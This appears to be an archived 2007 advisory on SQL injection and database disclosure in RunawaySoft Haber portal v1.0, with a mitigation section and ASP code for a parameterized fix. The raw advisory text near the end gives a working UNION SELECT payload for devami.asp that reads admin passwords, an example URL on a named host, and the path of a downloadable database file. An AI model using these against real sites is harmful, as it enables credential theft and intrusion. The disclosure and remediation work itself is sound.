Vendor: Haber portal
By: kerem125 & gsy
CVSS: N/A
Severity: MEDIUM
Category: Database Disclosure
CWE: 200
Product Name: Haber portal
Affected Version From: RunawaySoft Haber portal v1.0 (tr)
Affected Version To: RunawaySoft Haber portal v1.0 (tr)
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

RunawaySoft Haber portal v1.0 (tr) Database Disclosure

The advisory describes two ways to disclose the database of the RunawaySoft Haber portal v1.0 (tr). First, the 'id' parameter of the /devami.asp endpoint is placed unsanitized into a SQL query, so a UNION SELECT can be injected to read the 'sifre' (password) column of the 'admin' table; the raw advisory below gives an example URL. Second, the Access database file itself (haber/data/xice.mdb) is served from the web root and can be downloaded directly.

Mitigation:

The vendor should release a patch that fixes the SQL injection by validating the 'id' parameter and passing it to the query as a bound parameter instead of concatenating it into the SQL string. Additionally, the database file (haber/data/xice.mdb) should be moved outside the web root, or access to it restricted, so that it cannot be downloaded directly.
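As an added illustration of that mitigation (this is not RunawaySoft's code, and the table and column names `haber`, `baslik` and `metin` as well as the physical database path are assumed; only `devami.asp`, the `id` parameter and `xice.mdb` come from the advisory), the following classic ASP fragment shows the concatenation pattern that makes a UNION injection possible, commented out, beside a version that validates the parameter and binds it through ADODB.Command so the driver never interprets it as SQL:

```vbscript
' Added example for the mitigation above, not the product's own code.
' Assumed names: table haber, columns baslik/metin, and the physical .mdb path.
Dim conn, cmd, rs, re, rawId
rawId = Request.QueryString("id")

' Vulnerable pattern (kept commented out): the raw request value becomes part of the
' statement, so a value like "14 union select ..." is executed against the database.
' sql = "SELECT baslik, metin FROM haber WHERE id=" & rawId
' Set rs = conn.Execute(sql)

' Step 1: accept only a short run of digits; anything else is rejected outright.
Set re = New RegExp
re.Pattern = "^\d{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid id"
    Response.End
End If

' Step 2: the .mdb lives outside the web root (placeholder path), so it cannot be
' fetched as haber/data/xice.mdb the way the advisory's second example shows.
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\app-data\xice.mdb"

' Step 3: bind the value as a typed parameter; the "?" placeholder is filled by ADO.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandText = "SELECT baslik, metin FROM haber WHERE id = ?"
cmd.CommandType = 1   ' adCmdText
' CreateParameter(name, type, direction, size, value): 3 = adInteger, 1 = adParamInput
cmd.Parameters.Append cmd.CreateParameter("id", 3, 1, , CLng(rawId))
Set rs = cmd.Execute

If Not rs.EOF Then
    ' Encode on output as well, so stored content cannot inject markup into the page.
    Response.Write "<h1>" & Server.HTMLEncode(rs("baslik")) & "</h1>"
    Response.Write "<p>" & Server.HTMLEncode(rs("metin")) & "</p>"
End If
rs.Close
conn.Close
```

The regular-expression check alone would already stop the UNION payload, but the bound parameter is what removes the class of bug: even if validation is later loosened, the value reaches Jet as data, not as part of the statement.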

Exploit-DB raw data:

############################################################################################################
#Discovered by: kerem125 & gsy
#Website: http://www.kerem125.com/
#Script download: http://www.aspindir.com/goster/4901
#Exploit: /devami.asp?id=14 union+select+all+0,sifre,2,3,4,5,6,7+from+admin
#Admin Login : haber/admin/kontrol.asp
#Example: http://www.runaway.somee.com/rshaber/haber/devami.asp?id=1 union+select+all+0,sifre,2,3,4,5,6,7+from+admin
#
#Contact : kerem125@kerem125.com & by_gsy@hotmail.com

#Special Thanks to : by_emR3 - Bolivar - VolTiGoRe - CyberGhost - KinSize - xYz - F-10
############################################################################################################

RunawaySoft Haber portal v1.0 (tr) Database Disclosure
Example: [site.com]/[path]/haber/data/xice.mdb

# milw0rm.com [2007-05-16]